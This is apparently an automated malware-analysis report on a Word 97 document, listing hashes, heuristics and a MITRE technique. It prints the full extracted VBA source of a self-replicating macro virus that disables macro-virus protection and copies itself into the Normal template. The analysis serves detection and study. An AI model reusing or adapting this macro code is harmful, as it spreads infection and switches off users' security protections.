Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 065cf9d96690efa1…

MALICIOUS

Office (OLE)

33.5 KB Created: 2001-05-31 12:38:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-26
MD5: 1ce983c5d1a2462db071766697abce50 SHA-1: d17ff56da702965cdb496e25dbdf9f96cb2554fe SHA-256: 065cf9d96690efa11ba24d07ccd80ef0b7c2f72a123e9e134894649a1a064807
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' indicates that the VBA macros within this document are designed to disable macro virus protection and replicate themselves to the Normal template and the active document. This self-replication behavior is a strong indicator of malicious intent, aiming for persistence and potential spread across documents. No external IOCs like URLs or file hashes were extracted, but the internal VBA manipulation is the primary threat.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1010 bytes
SHA-256: 3622907e2f8975e54a38fb5d838a14d82046b353195745c49900f84829903232
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Hearer
Private Sub Document_close()
    On Error Resume Next
    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'Hearer" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
    End If
    If AD.Lines(1, 1) <> "'Hearer" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
    If (Day(Date) >= 16) Then
     MsgBox "Îøèáêà 1340", vbOKOnly
    End If
    ActiveDocument.Save
End Sub